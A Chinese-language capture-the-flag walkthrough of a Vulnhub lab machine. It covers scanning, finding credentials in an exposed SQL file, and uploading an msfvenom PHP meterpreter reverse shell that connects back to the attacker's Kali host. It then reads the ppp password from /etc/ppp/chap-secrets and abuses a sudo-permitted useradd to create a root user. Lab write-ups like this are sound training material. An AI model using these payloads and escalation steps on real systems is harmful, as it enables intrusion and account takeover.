1、 靶机概述
Description
Back to the Top
Level: Easy
flags: user, root
Description: This machine require a low skill to get user flag, a little more skill to escalate to root!
Author: foxlox
About VM: VirtualBox ready, the adapter is currently Bridged, DHCP active
链接: 靶机地址.
靶机和Kali虚拟机均同处在VMnet8的虚拟网卡下且使用NAT模式
Kali地址: 192.168.29.131
靶机地址:192.168.29.133
2、环境搭建
虚拟机加载下载的靶机包,启动靶机成功,此时,不知道登录密码和靶机IP地址。
Kali中使用arp-scan -l
扫描靶机地址,但没扫描到。
继续使用nmap -sn 192.168.29.0/24
进行扫描,还是没有扫描到靶机地址。
使用netdiscover -i eth0 -r 192.168.29.0/24
,也是没扫到。
百度上搜索了一下为什么vuln靶机获取不到P地址,原来是因为网卡服务启动失败,具体如何设置使其获取IP地址,可以参考 这篇文章:Vulnhub靶机检测不到IP地址。
设置完后,重新扫描,扫描到靶机地址。
3、信息收集
扫描靶机端口和服务,可知靶机开启了22和80端口。
登录192.168.29.133:80会跳转到291.68.29.133/lot路径下
页面并没有可利用的地方,接着进行后台路径扫描。
dirb http://192.168.29.133
只扫描树index.php(跳转到/lot目录);接着进行二级目录扫描dirb http://192.168.29.133/lot
发现了/lot/admin /lot/assets /lot/css /lot/database等目录。
访问/lot/database路径,发现有一个sql脚本,将其download下来打开,看看有没有敏感信息。
在sql脚本中,查看到用户名和密码,怀疑是web登录的用户名和密码。
将密码解密
4、获取shell
登录页面,发现存在上传功能。
使用msfvenom生成一个php马msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.29.131 lport=1234 -o shell.php
将其上传到服务器,通过burpsuite抓包,没有抓到存放的目录,但访问/lot/admin/assets目录发现存在上传目录
kali开启msf监听,然后访问上传的php文件,kali与靶机建立连接。
拿到shell后第1件事就是获取一个标准shell,可通过以下命令获取python -c 'import pty; pty.spawn("/bin/bash")'
5、提权
由于获取的web账户权限很低,需要继续获取高权限用户,继而获取root权限。
获取高权限用户
cat /etc/passwd查看一下系统存在的用户
发现一个用户ppp,我们需要获取该用户的权限,继续信息收集,find /etc -name ppp
搜索一下有关ppp的信息,发现/etc下存在ppp目录。/etc/ppp目录下查看chap-secrets文件,发现貌似ppp用户密码的一串字符串。
使用su 切换,登录ppp账户成功
在/home/ppp目录下找到flag
获取root权限
使用sudo -l 查询有哪些sudo权限命令
可以使用/usr/sbin/useradd 添加一个root权限用户
使用命令即可添加1个用户名为hacker,密码为123456的root权限用户
su hacker登录,获取root权限
在/etc下找到flag